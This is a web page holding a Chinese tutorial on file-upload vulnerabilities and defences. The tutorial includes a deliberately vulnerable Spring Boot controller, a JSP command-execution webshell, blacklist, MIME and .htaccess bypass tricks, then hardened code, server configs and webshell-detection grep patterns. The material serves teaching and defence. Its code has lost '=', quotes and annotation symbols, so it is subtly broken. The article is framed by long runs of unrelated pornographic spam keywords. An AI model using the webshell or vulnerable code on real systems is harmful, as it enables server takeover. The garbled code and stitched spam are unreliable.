久久亚洲成a人片熟女精品色一区二区三区|国产精品视频第一精品视频|av天堂热无码手机版|亚洲?v无码久久无遮挡|国产精品偷伦视频免费观看国产|麻豆国产自产精品丰满熟妇|av无码av不卡一区二区|久久亚洲精品中文字

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn)

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn) 在實(shí)際 Web 開發(fā)與安全測試中文件上傳功能是業(yè)務(wù)剛需也是安全重災(zāi)區(qū)。一個看似簡單的上傳接口背后涉及前端校驗(yàn)、后端處理、文件存儲、權(quán)限控制、安全過濾等多個環(huán)節(jié)任何一個環(huán)節(jié)的疏忽都可能導(dǎo)致嚴(yán)重的安全漏洞例如惡意文件上傳、服務(wù)器被控制、數(shù)據(jù)泄露等。對于開發(fā)者而言理解如何安全地實(shí)現(xiàn)文件上傳對于安全研究者或滲透測試人員而言理解如何發(fā)現(xiàn)并利用文件上傳漏洞是兩項(xiàng)同等重要的核心技能。本文將以一個實(shí)戰(zhàn)視角深入探討 Web 文件上傳的完整流程、常見安全漏洞的成因、攻擊手法以及對應(yīng)的防御策略。我們將從開發(fā)一個基礎(chǔ)的文件上傳功能開始逐步引入安全風(fēng)險并演示攻擊者如何繞過層層防御最終目標(biāo)是構(gòu)建一個既滿足業(yè)務(wù)需求又具備足夠安全性的文件上傳模塊。無論你是正在開發(fā)相關(guān)功能的 Java 或 PHP 開發(fā)者還是正在學(xué)習(xí) CTFCapture The Flag中 Web 題目或進(jìn)行滲透測試的安全愛好者這篇文章都將提供從原理到實(shí)踐的具體指導(dǎo)。1. 理解文件上傳的核心流程與安全邊界文件上傳不僅僅是用戶選擇文件并點(diǎn)擊“提交”按鈕那么簡單。一個完整的、考慮安全性的文件上傳流程通常涉及客戶端瀏覽器、服務(wù)器端應(yīng)用程序、服務(wù)器運(yùn)行環(huán)境如 Tomcat、Nginx以及最終的文件存儲系統(tǒng)本地磁盤、對象存儲等多個層面。1.1 標(biāo)準(zhǔn)文件上傳流程分解當(dāng)用戶通過網(wǎng)頁表單上傳文件時數(shù)據(jù)會以multipart/form-data的格式編碼并通過 HTTP POST 請求發(fā)送到服務(wù)器。服務(wù)器端應(yīng)用程序如 Spring MVC、Servlet、PHP接收到請求后需要解析這些復(fù)雜的數(shù)據(jù)提取出文件內(nèi)容和其他表單字段。一個簡化的安全上傳流程應(yīng)包含以下步驟前端校驗(yàn)通過 JavaScript 檢查文件大小、類型后綴名提供即時反饋提升用戶體驗(yàn)。注意前端校驗(yàn)極易被繞過絕不能作為安全依賴。HTTP 請求接收Web 容器如 Tomcat或框架如 Spring解析multipart/form-data請求。后端校驗(yàn)核心安全環(huán)節(jié)文件類型校驗(yàn)檢查文件的真實(shí)類型而非僅依賴后綴名。常用方法包括檢查文件內(nèi)容魔數(shù)Magic Number、MIME 類型。文件大小限制在代碼和服務(wù)器配置如 Nginx、Tomcat層面限制上傳文件大小防止拒絕服務(wù)攻擊DoS。文件名處理對上傳的文件名進(jìn)行重命名如使用 UUID防止路徑遍歷和覆蓋關(guān)鍵文件。內(nèi)容安全檢查對圖片文件進(jìn)行二次渲染對文本文件進(jìn)行惡意代碼掃描。安全存儲目錄權(quán)限上傳目錄應(yīng)設(shè)置為不可執(zhí)行腳本。例如在 Linux 下目錄權(quán)限應(yīng)為755文件權(quán)限應(yīng)為644。目錄隔離文件不應(yīng)存儲在 Web 根目錄下應(yīng)通過程序映射訪問。例如文件實(shí)際存儲在/var/uploads/通過/file/{id}這樣的控制器接口讀取并返回。使用對象存儲將文件上傳至阿里云 OSS、騰訊云 COS 等對象存儲服務(wù)徹底分離 Web 服務(wù)器和文件存儲。訪問控制對下載或訪問上傳文件的接口進(jìn)行權(quán)限校驗(yàn)防止未授權(quán)訪問。1.2 文件上傳漏洞的本質(zhì)文件上傳漏洞產(chǎn)生的根本原因在于服務(wù)器對用戶上傳的文件數(shù)據(jù)未進(jìn)行充分、有效的驗(yàn)證導(dǎo)致攻擊者能夠上傳被服務(wù)器解釋執(zhí)行的可執(zhí)行文件如.jsp,.php,.asp或特定配置下的.jpg。攻擊成功的關(guān)鍵在于上傳的文件必須能夠被 Web 服務(wù)器以某種方式“執(zhí)行”。例如上傳一個.jsp文件到 Tomcat 的 Web 應(yīng)用目錄該文件就會被 Tomcat 的 JSP 引擎編譯執(zhí)行。上傳一個.php文件到 Apache PHP 環(huán)境的網(wǎng)站根目錄該文件就會被 PHP 解析器執(zhí)行。在某些錯誤配置下上傳一個包含 PHP 代碼的.jpg文件如果服務(wù)器配置了AddType application/x-httpd-php .jpg該圖片文件也會被當(dāng)作 PHP 執(zhí)行。2. 環(huán)境準(zhǔn)備與靶場搭建為了清晰地演示漏洞和防御我們需要一個實(shí)驗(yàn)環(huán)境。你可以選擇以下任意一種方式2.1 使用 Docker 快速搭建漏洞靶場對于安全學(xué)習(xí)使用現(xiàn)成的漏洞靶場是最快的方式。這里推薦upload-labs一個專注于文件上傳漏洞的練習(xí)平臺。# 1. 確保已安裝 Docker docker --version # 2. 拉取 upload-labs 鏡像 docker pull c0ny1/upload-labs # 3. 運(yùn)行容器將容器內(nèi)80端口映射到宿主機(jī)的8080端口 docker run -d -p 8080:80 --name upload-labs c0ny1/upload-labs # 4. 訪問 http://localhost:8080 即可開始挑戰(zhàn)2.2 手動創(chuàng)建簡易漏洞演示項(xiàng)目Java Web如果你想從開發(fā)者視角理解漏洞產(chǎn)生可以創(chuàng)建一個簡單的 Spring Boot 項(xiàng)目。項(xiàng)目初始化使用 Spring Initializr 或 IDE 創(chuàng)建一個 Spring Boot 項(xiàng)目依賴選擇Spring Web和Thymeleaf用于簡單前端。創(chuàng)建上傳頁面(src/main/resources/templates/upload.html)!DOCTYPE html html xmlns:thhttp://www.thymeleaf.org head meta charsetUTF-8 title不安全的上傳演示/title /head body h2文件上傳不安全版本/h2 form action/upload methodpost enctypemultipart/form-data input typefile namefile / br/br/ input typesubmit value上傳 / /form p th:text${message}/p /body /html創(chuàng)建漏洞控制器(src/main/java/com/example/demo/controller/UnsafeUploadController.java)import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.multipart.MultipartFile; import org.springframework.web.servlet.ModelAndView; import java.io.File; import java.io.IOException; Controller public class UnsafeUploadController { // 定義一個不安全的存儲路徑在Web可訪問目錄下 private final String UPLOAD_DIR src/main/resources/static/uploads/; GetMapping(/) public String index() { return upload; } PostMapping(/upload) public ModelAndView handleFileUpload(RequestParam(file) MultipartFile file) { ModelAndView mav new ModelAndView(upload); if (file.isEmpty()) { mav.addObject(message, 請選擇一個文件上傳。); return mav; } try { // 漏洞點(diǎn)1直接使用原始文件名存在路徑遍歷風(fēng)險 String fileName file.getOriginalFilename(); // 漏洞點(diǎn)2文件存儲在Web靜態(tài)資源目錄下可直接通過URL訪問 File dest new File(UPLOAD_DIR fileName); // 創(chuàng)建目錄如果不存在 dest.getParentFile().mkdirs(); file.transferTo(dest); mav.addObject(message, 文件上傳成功: dest.getAbsolutePath()); } catch (IOException e) { e.printStackTrace(); mav.addObject(message, 文件上傳失敗: e.getMessage()); } return mav; } }配置(src/main/resources/application.properties)# 設(shè)置單個文件最大大小僅為示例實(shí)際需要更多配置 spring.servlet.multipart.max-file-size10MB spring.servlet.multipart.max-request-size10MB運(yùn)行這個 Spring Boot 應(yīng)用你就擁有了一個具備典型漏洞的上傳點(diǎn)。3. 常見文件上傳漏洞攻擊手法與演示我們將基于上面創(chuàng)建的簡易漏洞項(xiàng)目演示幾種常見的攻擊手法。3.1 攻擊手法一直接上傳 Webshell這是最基礎(chǔ)的情況服務(wù)器未做任何過濾。準(zhǔn)備 Webshell創(chuàng)建一個簡單的 JSP Webshell 文件shell.jsp。% page importjava.util.*,java.io.*% % // 非常簡單的命令執(zhí)行Webshell if(request.getParameter(cmd) ! null) { Process p Runtime.getRuntime().exec(request.getParameter(cmd)); OutputStream os p.getOutputStream(); InputStream in p.getInputStream(); DataInputStream dis new DataInputStream(in); String disr dis.readLine(); while ( disr ! null ) { out.println(disr); disr dis.readLine(); } } %發(fā)起攻擊訪問http://localhost:8080/選擇shell.jsp文件并上傳。訪問 Webshell如果上傳成功文件將位于http://localhost:8080/uploads/shell.jsp。訪問該 URL并附加參數(shù)?cmdwhoami即可在頁面上看到服務(wù)器執(zhí)行whoami命令的結(jié)果。漏洞原因后端代碼未對文件后綴名、內(nèi)容做任何檢查且文件存儲在 Web 可訪問目錄。3.2 攻擊手法二繞過前端校驗(yàn)很多網(wǎng)站僅在前端通過 JavaScript 檢查文件后綴名。前端校驗(yàn)示例在upload.html的form標(biāo)簽前添加 JS 代碼。script function checkFile() { var file document.querySelector(input[typefile]).files[0]; var fileName file.name; var ext fileName.substring(fileName.lastIndexOf(.) 1).toLowerCase(); if (ext ! jpg ext ! png ext ! gif) { alert(只允許上傳圖片文件 (jpg, png, gif)); return false; } return true; } /script form ... onsubmitreturn checkFile() ...繞過方法方法A禁用JS在瀏覽器設(shè)置中禁用 JavaScript即可直接上傳任意文件。方法B代理攔截修改使用 Burp Suite 或 Fiddler 等抓包工具。先正常選擇一個test.jpg文件上傳用抓包工具截獲 POST 請求。在抓包工具中將請求體中的文件名test.jpg修改為shell.jsp同時確保文件內(nèi)容Content-Disposition部分和后續(xù)的二進(jìn)制內(nèi)容是正確的 Webshell 代碼。將修改后的請求發(fā)送給服務(wù)器。結(jié)果服務(wù)器接收到的是shell.jsp的文件名和內(nèi)容前端校驗(yàn)被完全繞過。漏洞原因信任了完全由客戶端控制的數(shù)據(jù)。3.3 攻擊手法三繞過黑名單校驗(yàn)特殊解析漏洞假設(shè)后端采用了黑名單機(jī)制禁止了.jsp,.php,.asp等后綴。// 在Controller中添加黑名單檢查 String[] blackList {.jsp, .php, .asp, .aspx, .jspx}; String fileName file.getOriginalFilename().toLowerCase(); for (String badExt : blackList) { if (fileName.endsWith(badExt)) { mav.addObject(message, 禁止上傳此類文件); return mav; } }攻擊者可以嘗試以下繞過方式大小寫繞過.Jsp,.PhP如果后端校驗(yàn)時未統(tǒng)一轉(zhuǎn)為小寫。雙寫后綴繞過shell.jsp.jsp如果后端只簡單地刪除一次.jsp字符串。空格/點(diǎn)號繞過shell.jsp.或shell.jsp末尾空格在某些系統(tǒng)處理文件名時會被忽略。利用解析特性Apache如果配置不當(dāng)shell.php.jpg可能被解析為.php文件。IIS 6.0shell.asp;.jpg或shell.asp:.jpg目錄名曾是有名的解析漏洞。Nginx錯誤配置fastcgi導(dǎo)致shell.jpg/.php被解析為 PHP 文件。.htaccess攻擊針對 Apache如果服務(wù)器允許上傳.htaccess文件攻擊者可以上傳一個自定義的.htaccess內(nèi)容為AddType application/x-httpd-php .jpg這將使該目錄下所有.jpg文件都被當(dāng)作 PHP 執(zhí)行。然后再上傳一個包含 PHP 代碼的shell.jpg即可。3.4 攻擊手法四繞過內(nèi)容類型MIME校驗(yàn)有些后端會檢查 HTTP 請求頭中的Content-Type。// 檢查Content-Type if (!file.getContentType().equals(image/jpeg) !file.getContentType().equals(image/png)) { mav.addObject(message, 文件類型不正確); return mav; }繞過方法和繞過前端校驗(yàn)一樣使用抓包工具如 Burp Suite直接修改請求頭中的Content-Type將其改為image/jpeg而請求體中的文件內(nèi)容仍然是 Webshell。漏洞原因Content-Type同樣來自客戶端請求頭完全可控不可信。3.5 攻擊手法五利用文件包含漏洞配合上傳這是一種組合攻擊。假設(shè)網(wǎng)站存在文件包含漏洞如 PHP 的include($_GET[‘file’])且上傳功能對圖片內(nèi)容做了嚴(yán)格檢查如二次渲染導(dǎo)致無法直接上傳可執(zhí)行腳本。攻擊步驟上傳一個內(nèi)容為?php phpinfo();?的純文本文件命名為info.txt。由于內(nèi)容是文本可能通過檢查。利用文件包含漏洞訪問http://victim.com/include.php?file./uploads/info.txt。服務(wù)器執(zhí)行了include將info.txt的內(nèi)容作為 PHP 代碼解析從而執(zhí)行了phpinfo()。漏洞原因上傳點(diǎn)與文件包含漏洞點(diǎn)形成“組合拳”本地文件包含LFI可以包含用戶上傳的文件。4. 構(gòu)建安全的文件上傳功能了解了攻擊方式我們就可以有針對性地構(gòu)建防御。安全是一個過程需要多層防護(hù)。4.1 防御策略總覽防御層具體措施目的前端JS 校驗(yàn)文件大小、類型改善用戶體驗(yàn)非安全措施網(wǎng)絡(luò)層WAFWeb應(yīng)用防火墻攔截已知攻擊payload應(yīng)用層核心1. 白名單文件后綴2. 校驗(yàn)文件類型魔數(shù)3. 重命名文件UUID4. 限制文件大小5. 圖片二次渲染/壓縮6. 病毒/惡意代碼掃描實(shí)現(xiàn)業(yè)務(wù)邏輯層面的安全校驗(yàn)服務(wù)器配置1. 上傳目錄無執(zhí)行權(quán)限2. 資源文件通過程序讀取3. 定期清理未關(guān)聯(lián)文件防止上傳的文件被直接執(zhí)行架構(gòu)層使用對象存儲OSS/COS實(shí)現(xiàn)業(yè)務(wù)服務(wù)器與文件存儲分離4.2 安全上傳代碼實(shí)現(xiàn)Java Spring Boot 示例下面是一個相對安全的文件上傳控制器實(shí)現(xiàn)import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.*; import org.springframework.web.multipart.MultipartFile; import org.apache.commons.io.FilenameUtils; import org.apache.tika.Tika; import javax.imageio.ImageIO; import java.awt.image.BufferedImage; import java.io.*; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.Arrays; import java.util.List; import java.util.UUID; Controller public class SafeUploadController { // 從配置文件中讀取確保不在Web目錄下 Value(${app.upload.dir:/var/uploads/}) private String uploadBaseDir; // 允許上傳的文件類型白名單后綴名 private static final ListString ALLOWED_EXTENSIONS Arrays.asList(jpg, jpeg, png, gif); // 允許的MIME類型白名單 private static final ListString ALLOWED_MIME_TYPES Arrays.asList(image/jpeg, image/png, image/gif); // 最大文件大小 5MB private static final long MAX_FILE_SIZE 5 * 1024 * 1024; PostMapping(/safe-upload) ResponseBody public String handleSafeFileUpload(RequestParam(file) MultipartFile file) { // 1. 檢查文件是否為空 if (file.isEmpty()) { return 文件為空。; } // 2. 檢查文件大小 if (file.getSize() MAX_FILE_SIZE) { return 文件大小超過限制5MB。; } // 3. 校驗(yàn)文件后綴名白名單 String originalFileName file.getOriginalFilename(); String fileExtension FilenameUtils.getExtension(originalFileName).toLowerCase(); if (!ALLOWED_EXTENSIONS.contains(fileExtension)) { return 不支持的文件類型。; } // 4. 校驗(yàn)文件真實(shí)類型使用Apache Tika檢測魔數(shù) try { Tika tika new Tika(); String detectedType tika.detect(file.getBytes()); if (!ALLOWED_MIME_TYPES.contains(detectedType)) { return 文件真實(shí)類型與后綴名不符或不被允許。; } } catch (IOException e) { return 文件類型檢測失敗。; } // 5. 如果是圖片可以進(jìn)行二次渲染徹底清除元數(shù)據(jù)和非圖像數(shù)據(jù) if (fileExtension.matches(jpg|jpeg|png|gif)) { try { BufferedImage image ImageIO.read(file.getInputStream()); if (image null) { return 上傳的文件不是有效的圖片。; } // 這里可以添加圖片壓縮、縮放等處理 // ImageIO.write(image, png, ...); } catch (IOException e) { return 圖片處理失敗文件可能已損壞。; } } // 6. 生成安全的存儲文件名和路徑 String safeFileName UUID.randomUUID().toString() . fileExtension; // 使用UUID重命名 Path uploadPath Paths.get(uploadBaseDir).toAbsolutePath().normalize(); Path filePath uploadPath.resolve(safeFileName); // 確保上傳目錄存在且安全 try { Files.createDirectories(uploadPath); // 重要檢查目錄是否在預(yù)期范圍內(nèi)防止路徑遍歷 if (!filePath.normalize().startsWith(uploadPath.normalize())) { return 無效的文件路徑。; } } catch (IOException e) { return 無法創(chuàng)建上傳目錄。; } // 7. 保存文件 try (InputStream inputStream file.getInputStream()) { Files.copy(inputStream, filePath); } catch (IOException e) { return 文件保存失敗。; } // 8. 返回文件訪問ID非真實(shí)路徑通過另一個安全接口訪問 String fileId safeFileName; // 實(shí)際可能用數(shù)據(jù)庫關(guān)聯(lián)ID return 文件上傳成功。訪問ID: fileId; } // 安全訪問文件的接口 GetMapping(/file/{fileId}) public void getFile(PathVariable String fileId, HttpServletResponse response) { // 1. 根據(jù)fileId從數(shù)據(jù)庫或緩存中查詢真實(shí)文件名和路徑此處簡化 // 2. 進(jìn)行權(quán)限校驗(yàn)如用戶是否登錄、是否有權(quán)訪問此文件 // 3. 從安全的存儲目錄讀取文件流 Path filePath Paths.get(uploadBaseDir, fileId).normalize(); File file filePath.toFile(); if (!file.exists()) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); return; } // 4. 設(shè)置正確的Content-Type并輸出流 response.setContentType(Files.probeContentType(filePath)); try (OutputStream os response.getOutputStream(); FileInputStream fis new FileInputStream(file)) { byte[] buffer new byte[1024]; int bytesRead; while ((bytesRead fis.read(buffer)) ! -1) { os.write(buffer, 0, bytesRead); } os.flush(); } catch (IOException e) { response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR); } } }關(guān)鍵防御點(diǎn)解釋白名單校驗(yàn)只允許明確需要的文件類型。文件類型檢測使用 Apache Tika 等庫通過文件內(nèi)容的魔數(shù)判斷真實(shí)類型不信任后綴名和Content-Type。圖片二次渲染使用ImageIO.read和write處理圖片可以剝離可能隱藏在元數(shù)據(jù)如 EXIF或文件冗余數(shù)據(jù)區(qū)中的惡意代碼。文件重命名使用 UUID 等隨機(jī)字符串避免文件名沖突和路徑遍歷攻擊。路徑安全使用Paths.get().normalize()和startsWith()檢查防止../../../etc/passwd這類路徑遍歷。存儲隔離文件存儲在 Web 根目錄之外如/var/uploads/不能通過http://domain/uploads/xxx直接訪問必須通過后端控制器/file/{id}進(jìn)行鑒權(quán)后訪問。4.3 服務(wù)器與中間件安全配置代碼層面的安全需要配合服務(wù)器配置才能生效。Nginx 配置示例防止上傳目錄執(zhí)行腳本location ^~ /uploads/ { # 如果文件必須放在Web目錄下則禁止執(zhí)行任何腳本 location ~* \.(jsp|php|asp|aspx|pl|py)$ { deny all; return 403; } # 或者對于上傳目錄直接返回403 # deny all; # return 403; }Apache 配置示例在.htaccess或httpd.conf中Directory /var/www/html/uploads # 禁止執(zhí)行任何腳本 php_flag engine off RemoveHandler .php .php3 .php4 .php5 .php7 .phtml RemoveType .php .php3 .php4 .php5 .php7 .phtml # 只允許訪問圖片等靜態(tài)文件 FilesMatch \.(jpg|jpeg|png|gif|ico|txt|pdf)$ Order Allow,Deny Allow from all /FilesMatch FilesMatch \.(php|pl|py|jsp|asp|sh|cgi)$ Order Deny,Allow Deny from all /FilesMatch /DirectoryLinux 目錄權(quán)限# 上傳目錄應(yīng)屬于運(yùn)行Web服務(wù)的用戶如www-data, tomcat chown -R www-data:www-data /var/uploads/ # 目錄權(quán)限755文件權(quán)限644確保目錄不可寫除非需要上傳 chmod 755 /var/uploads/ # 如果程序需要寫文件可以設(shè)置目錄為775但務(wù)必確保沒有執(zhí)行權(quán)限問題5. 文件上傳漏洞的排查與應(yīng)急響應(yīng)即使采取了措施也可能存在未知的繞過方式。需要建立監(jiān)控和響應(yīng)機(jī)制。5.1 如何發(fā)現(xiàn)文件上傳漏洞作為開發(fā)者/防御方代碼審計檢查文件上傳相關(guān)代碼是否僅依賴黑名單、是否未校驗(yàn)內(nèi)容、是否存儲路徑可訪問。日志分析監(jiān)控上傳接口的訪問日志尋找異常請求如頻繁上傳、異常后綴、過大文件。文件系統(tǒng)監(jiān)控使用inotify等工具監(jiān)控上傳目錄警惕非圖片文件尤其是.jsp,.php,.htaccess的出現(xiàn)。安全掃描使用 AWVS、Nessus 或開源工具定期對上傳功能進(jìn)行掃描。作為攻擊方/滲透測試方模糊測試使用 Burp Suite Intruder 或自定義腳本批量嘗試各種繞過技巧大小寫、雙寫、特殊字符、不同 Content-Type。解析漏洞測試針對特定服務(wù)器IIS, Nginx, Apache測試歷史解析漏洞的變種。組合漏洞測試檢查是否存在文件包含、任意文件讀取等漏洞可與上傳點(diǎn)結(jié)合利用。5.2 常見問題排查清單當(dāng)懷疑存在文件上傳漏洞或已遭攻擊時按此清單排查排查項(xiàng)操作命令/檢查點(diǎn)說明1. 檢查近期上傳文件find /var/www/html/uploads -type f -mtime -1(查找1天內(nèi)修改的文件)快速定位可疑新增文件。2. 查找Webshell特征grep -r Runtime.getRuntime|eval(|system(|passthru|shell_exec /var/www/html/在Web目錄中搜索常見危險函數(shù)。3. 檢查服務(wù)器進(jìn)程ps auxgrep java|php|tomcat或netstat -tulnp4. 分析Web訪問日志tail -f /var/log/nginx/access.log | grep \POST.*upload\或搜索.jsp,.php的訪問記錄。定位攻擊來源和攻擊時間。5. 檢查定時任務(wù)crontab -l(當(dāng)前用戶) 和ls /etc/cron.*Webshell 常會添加后門定時任務(wù)。6. 檢查系統(tǒng)用戶cat /etc/passwd查看是否有新增的未知用戶。7. 驗(yàn)證修復(fù)是否生效重新嘗試之前成功的攻擊 payload確認(rèn)是否被攔截。確保修復(fù)措施已生效。5.3 應(yīng)急響應(yīng)步驟隔離立即禁用文件上傳功能或整個應(yīng)用。定位根據(jù)上述排查清單找到被上傳的惡意文件。清除刪除所有發(fā)現(xiàn)的 Webshell 和異常文件。注意檢查文件創(chuàng)建時間、隱藏文件以.開頭、以及可能被插入惡意代碼的正常文件。溯源分析日志確定攻擊入口、攻擊者 IP、攻擊時間線。修復(fù)根據(jù)漏洞原因?qū)嵤┍菊碌?節(jié)的安全措施。加固修復(fù)服務(wù)器配置審查所有上傳點(diǎn)代碼考慮引入 WAF 規(guī)則。監(jiān)控加強(qiáng)日志審計和文件監(jiān)控設(shè)置告警。6. 進(jìn)階話題與最佳實(shí)踐6.1 使用對象存儲服務(wù)將文件上傳至云端對象存儲如阿里云 OSS、騰訊云 COS、MinIO是當(dāng)前的最佳實(shí)踐。它帶來了多重好處安全分離業(yè)務(wù)服務(wù)器與文件存儲分離即使文件被上傳惡意腳本也無法在業(yè)務(wù)服務(wù)器上執(zhí)行。彈性擴(kuò)展存儲容量和帶寬易于擴(kuò)展。高可用與持久性對象存儲通常提供多副本冗余。便捷處理很多服務(wù)提供圖片處理、視頻截幀等能力。集成時通常由業(yè)務(wù)服務(wù)器向?qū)ο蟠鎯Ψ?wù)商申請一個臨時的上傳憑證STS Token前端直接使用該憑證將文件上傳至對象存儲上傳成功后對象存儲回調(diào)業(yè)務(wù)服務(wù)器或前端通知業(yè)務(wù)服務(wù)器文件信息如 URL。業(yè)務(wù)服務(wù)器只保存文件的元信息如存儲路徑、大小、類型不直接處理文件流。6.2 文件內(nèi)容深度檢查對于高風(fēng)險場景需要更深入的內(nèi)容檢查反病毒掃描集成 ClamAV 等開源殺毒引擎對上傳文件進(jìn)行掃描。靜態(tài)代碼分析對于允許上傳的文本文件如 PDF, DOC可以檢查是否包含惡意宏或腳本。沙箱動態(tài)檢測對于無法確認(rèn)的文件可以將其在隔離的沙箱環(huán)境中運(yùn)行觀察其行為。6.3 針對 CTF 與滲透測試的特別技巧在 CTF 或授權(quán)滲透測試中目標(biāo)往往是刻意存在漏洞的。除了上述常見方法還需注意信息收集查看網(wǎng)頁源碼、JS 文件尋找隱藏的上傳點(diǎn)或提示。檢查 HTTP 響應(yīng)頭有時錯誤信息或特殊的響應(yīng)頭會提示服務(wù)器類型、組件版本。嘗試各種解析漏洞研究目標(biāo)服務(wù)器Apache/Nginx/IIS/Tomcat特定版本的已知解析漏洞。利用條件競爭如果服務(wù)器先保存文件再檢查內(nèi)容可能存在時間差可以嘗試在文件被刪除前訪問并執(zhí)行它。結(jié)合其他漏洞如目錄遍歷、文件包含、XXEXML外部實(shí)體注入等與文件上傳結(jié)合形成攻擊鏈。文件上傳功能是 Web 安全的試金石。一個健壯的上傳模塊需要開發(fā)者具備防御性編程思維不信任任何來自客戶端的數(shù)據(jù)并在前端、后端、服務(wù)器配置、網(wǎng)絡(luò)架構(gòu)多個層面實(shí)施縱深防御。對于安全人員而言理解攻擊者的繞過手法是進(jìn)行有效代碼審計和滲透測試的基礎(chǔ)。在實(shí)踐中沒有一勞永逸的銀彈持續(xù)關(guān)注新的攻擊手法定期審查和更新安全策略才是保障系統(tǒng)安全的關(guān)鍵。建議將本文中的安全代碼示例作為起點(diǎn)結(jié)合項(xiàng)目的具體業(yè)務(wù)邏輯和架構(gòu)構(gòu)建適合自身的安全上傳方案。
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
男人a天堂手机在线版| 美国aaaaa一级黄片| 看看小穴| 91|九色|国产熟女| 亚洲 欧美 偷拍 唯美| 中文字幕成人乱码熟女精品国50| 久久精品人妻一区二区| 99999无码| 草莓精品视频| 欧美爆乳精品一区二区| 国产91美女视频| 久久、1234| 午夜福利在线合集| 美女网站91| 日本污ww视频网站| 天天激色| 男男H黄动漫啪啪无遮挡网站| 五月婷在线| 操逼天美3区| 91国模| 91网站18+| 九九热免费国产视频婷婷伊人五月 | 日本色色色色色视频| 国产高清午夜成人在线观看| 成人小电影网站tex| 亚洲黄色网址| 久久久久久中文| 久久精品夜色国产亚洲AV| 人夜夜精品网站香蕉嫩草| 国产亚洲日本精品在线| 高清无码 国产精品| 久久精品国产亚洲AV清纯| 青娱乐休闲视频在线观看| 国产熟女无套内射| 国产综合久久久麻桃个 | 蜜臀AV成人精品蜜臀| 乱伦a片视频| 欧美亚洲一级在线观看| 色婷婷日韩精品一区二区三区| 亚洲欧美国产成人综合不卡| 翔田千里av一区二区三区| 狼狼色丁香久久婷婷综合五月| 国产91影院| 一本久道久久综合狠狠爱一密臀精| 九一国产精品| 精品成人女人久久| 蜜汁欧美| 久久夜夜| 精品欧美日韩在线观看| 亚洲美女30b| 欧美日韩另类在线| 国产黄片在线免费观看| 国产高清精品福利| 人人操av| 亚洲情色在线| 日本 情色 1区| 99精品人妻| 一级性爱视频免费观看| 国产精品永久免费10000| 国产丝袜美女在线一区| 国产亚洲精品美女久久久m| 日本三级一区二区 在线| 国产精品69人妻无码久久久| 欧美1727免费观看视频| 夜夜嗷嗷一区二区| 骚货操死你| 国产日韩久久| 国产色精品午夜大片| 久久久久9| 2019AV天堂| 啊啊啊啊啊啊啊啊要喷了| 日韩射图| 国产亚洲精品美女久久久| 欧美综合区| 26uuu欧美| 亚洲综合影视| 国产蜜臀精品一区免费尤物| 色香综合天天影视综合 | 欧美天天综合站| 国产精品嫩草影院午夜两性| 亚洲丝袜二区在线| 亚洲精品成人| 五月婷丁香| 操逼天美3区| 国产美女裸体秘 永久无遮挡| 熟女自慰久久久| 性欧美91| 全球成人中文在线| 91视频成人福利网站在线一区 | 国产对白刺激视频| 蜜桃成人1区2区3区| 久久是精品| 欧美高潮| 国产A v无码专区| 91九色精品熟女内射| 欧美A√综合网| 欧亚 另类 久| 国产精品探花在线| 四虎国产成人精品免费一女五男| 69视频入口| 九九色色| 精品无人区麻豆乱码1区2区图片| 免費人妻夜夜爽天天爽爽一区| 久久久久久久一级黄色打同平台| 欧美成人精品欧美一级乱黄一区二…| 亚洲91射| 久久成人午夜精品影院| 久热69九色熟妇97| 亚洲清纯综合| 激情五月婷婷综合| 一区二区中文| 男人的天堂激情| 久久久久久久性爱| 亚洲男人的天堂va亚洲男人社| 永久电影三级在线观看| 色婷婷丁香五月| 校园春色欧美| 亚洲97久久精品亚洲| 青青草吊丝| 国产高清成人免费视频| 台湾佬中文娱乐自偷自拍| 天天爽天天操啊啊啊| 台欧久久精品视频| 新版天堂中文资源8在线| 国产精品免费日韩| 怡红院亚洲怡春院av| 99色在线观看| 午夜性| 婷婷性网| 求求你操操我| 97在线免费看| www.色操逼| 国产久久久久久| 欧美综合综合| 一本色道综合久久欧美日韩精品| 91性感网站| 午夜精品99久久久久传媒| 色狠狠 - 百度| 亚一综合久久久久久久久久| 男女激烈网站最新| 成人自拍三级在线观看| 91久久久亚洲| 操屄日韩| 蜜乳AV免费观看| 亚洲超碰97| 殴美性天天| 青草精品视频日本久久久久网站在线| 超碰97综合网| 亚洲春色一区二区三区| 国产精品麻豆视频网站| 色狠狠综合| 亚洲精品819| baiduhicn.com。| 欧美日综合| 国产乱伦搜索结果91P| 亚洲天堂AV在线播放| 亚洲色图殴美色图激情乱伦| 麻豆AV短剧| 亚洲AV不卡在线观看| 中文视频在线观看| 爱射综合| 99re在线视频国产| 成人精品无码| 夜夜肏2021| 亚洲欧美啪啪| 夜夜影视四色| 久久久网一区| av强奸乱轮| 第45页一区二区| av三级电影在线播放| 狠狠综合网| 欧美日韩97在线| 国产精品亚洲天堂网址| 色哟哟-国产专区| 97精品网| 欧美日韩99精品麻豆传媒| 国产一区在线看| 九九亚洲| 亚洲欧美综合| 国产乱弄免费在线视频。| av亚欧| 97硬碰| 老司机香蕉久久久久| 一色网男人的天堂| 无码精品久久| 蜜桃狠狠色伊人亚洲综合 | 91草草草| 亚欧成人综合影院| 色婷婷一区二区三区久久午夜成人不| 婷婷综合视频| 国产捆绑一区| 国产精品色约约| 99精品久久| 国产偷人妻精品一区二区在线| 国产 亚洲 丝袜 制服| 青青草原av| www.高清无码诱惑一区.com | 日本黄色天堂| 97人人射| 亚洲天天影视色综合| 亚洲熟妇图片| 国产亚洲精品第一最新| 国产精品一区二区三区四区五区| 麻豆成人av| 久久久久久久人妻| 在线无码操| 夜夜嗨视频| 蜜桃臀一区二区aV| 国产乱码精品久久久久久| 国产成人在线观看综合| 密乳无码| 青青伊人这里只有精品| 操逼视频国产无套| 99色网| 欧美图片校园春色| 欧美洲精品一级| 欧美亚洲丝袜美女电影| 五月天激情小说| 国产专区第一页| 久久性爱视频免费看| 怡春院久久| 欧美伦乱爱| 